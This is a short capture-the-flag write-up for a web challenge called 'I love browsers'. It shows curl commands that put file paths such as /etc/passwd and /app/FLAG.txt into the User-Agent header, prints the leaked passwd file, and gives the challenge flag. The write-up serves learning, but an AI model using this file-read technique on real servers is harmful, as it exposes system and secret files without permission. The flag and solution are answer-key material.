I didn't spend too much time in this CTF. So I wrote writeups about only few problems.
● [ I love browsers ]
In this main page, it shows "Hello [user's browser] user" sentence. The two ways that service knows user's website is using Javascript or using "User-agent" header. This service doesn't seem to run by javascript, so I tested by using "User-agent" header. I wrote Safari in it, this service works. And another thing I found is that, in the header it doesn't care what words in front. It only cares last word and right of "/".
So I used curl command to modify "User-agent" header like this.
curl -H "User-Agent: .." http://52.59.124.14:10009
ㄴ<a href="https://xkcd.com/838/">This incident will be reported</a>I tried to check above directory, but failed. So I checked /etc/passwd
>> curl -H "User-Agent: /etc/passwd" http://52.59.124.14:10009
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Hello /etc/passwd user</title>
</head>
<body bgcolor="lightblue">
<div align="center">
<h1>Hello /etc/passwd user</h1>
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
#flag is in /app/FLAG.txt
</div>
<div style="height: 100px;">
</div>
<div align="center">
<table id="data" class="table table-striped">
<thead>
<tr>
<th>Author</th>
<th>Comment</th>
</tr>
</thead>
<tbody>
<tr>
<td>testron</td>
<td>tata</td>
</tr>
</tbody>
</table>
<form action="/test" method="post">
<table>
<tr>
<td>Name:</td>
<td><input type="text" name="user"></td>
</tr>
<tr>
<td>Comment:</td>
<td><textarea style="height:100px;" type="text" name="comment"></textarea></td>
</tr>
</table>
<input type="submit">
</form>
</div>
</body>
</html>Jackpot! I searched all directories by using this way. Flag is in "/app/FLAG.txt".
Payload
curl -H "User-Agent: /app/FLAG.txt" http://52.59.124.14:10009Flag
ENO{Why,os.path,why?}